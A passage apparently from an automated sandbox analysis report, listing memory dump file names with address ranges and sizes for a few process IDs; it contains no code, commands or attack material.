                                                          • memory/396-79-0x00007FF8672C0000-0x00007FF8672CD000-memory.dmp

                                                            Filesize

                                                            52KB

                                                          • memory/396-60-0x00007FF857470000-0x00007FF8575E3000-memory.dmp

                                                            Filesize

                                                            1.4MB

                                                          • memory/396-163-0x00007FF8672E0000-0x00007FF867303000-memory.dmp

                                                            Filesize

                                                            140KB

                                                          • memory/396-292-0x00007FF856AD0000-0x00007FF856E45000-memory.dmp

                                                            Filesize

                                                            3.5MB

                                                          • memory/396-304-0x0000024BB44F0000-0x0000024BB4865000-memory.dmp

                                                            Filesize

                                                            3.5MB

                                                          • memory/396-311-0x00007FF857470000-0x00007FF8575E3000-memory.dmp

                                                            Filesize

                                                            1.4MB

                                                          • memory/396-305-0x00007FF857840000-0x00007FF857E28000-memory.dmp

                                                            Filesize

                                                            5.9MB

                                                          • memory/396-306-0x00007FF8688E0000-0x00007FF868904000-memory.dmp

                                                            Filesize

                                                            144KB

                                                          • memory/396-320-0x00007FF857840000-0x00007FF857E28000-memory.dmp

                                                            Filesize

                                                            5.9MB

                                                          • memory/396-333-0x00007FF8672C0000-0x00007FF8672CD000-memory.dmp

                                                            Filesize

                                                            52KB

                                                          • memory/396-334-0x00007FF856750000-0x00007FF85686C000-memory.dmp

                                                            Filesize

                                                            1.1MB

                                                          • memory/396-343-0x00007FF866F50000-0x00007FF866F7E000-memory.dmp

                                                            Filesize

                                                            184KB

                                                          • memory/396-342-0x00007FF8672D0000-0x00007FF8672DD000-memory.dmp

                                                            Filesize

                                                            52KB

                                                          • memory/396-341-0x00007FF867330000-0x00007FF867349000-memory.dmp

                                                            Filesize

                                                            100KB

                                                          • memory/396-340-0x00007FF857470000-0x00007FF8575E3000-memory.dmp

                                                            Filesize

                                                            1.4MB

                                                          • memory/396-339-0x00007FF8672E0000-0x00007FF867303000-memory.dmp

                                                            Filesize

                                                            140KB

                                                          • memory/396-338-0x00007FF867C60000-0x00007FF867C79000-memory.dmp

                                                            Filesize

                                                            100KB

                                                          • memory/396-337-0x00007FF8673C0000-0x00007FF8673ED000-memory.dmp

                                                            Filesize

                                                            180KB

                                                          • memory/396-336-0x00007FF8688E0000-0x00007FF868904000-memory.dmp

                                                            Filesize

                                                            144KB

                                                          • memory/396-335-0x00007FF86E5A0000-0x00007FF86E5AF000-memory.dmp

                                                            Filesize

                                                            60KB

                                                          • memory/396-331-0x00007FF856AD0000-0x00007FF856E45000-memory.dmp

                                                            Filesize

                                                            3.5MB

                                                          • memory/1056-89-0x0000016632A70000-0x0000016632A92000-memory.dmp

                                                            Filesize

                                                            136KB

                                                          • memory/2132-203-0x0000020DFAEB0000-0x0000020DFAEB8000-memory.dmp

                                                            Filesize

                                                            32KB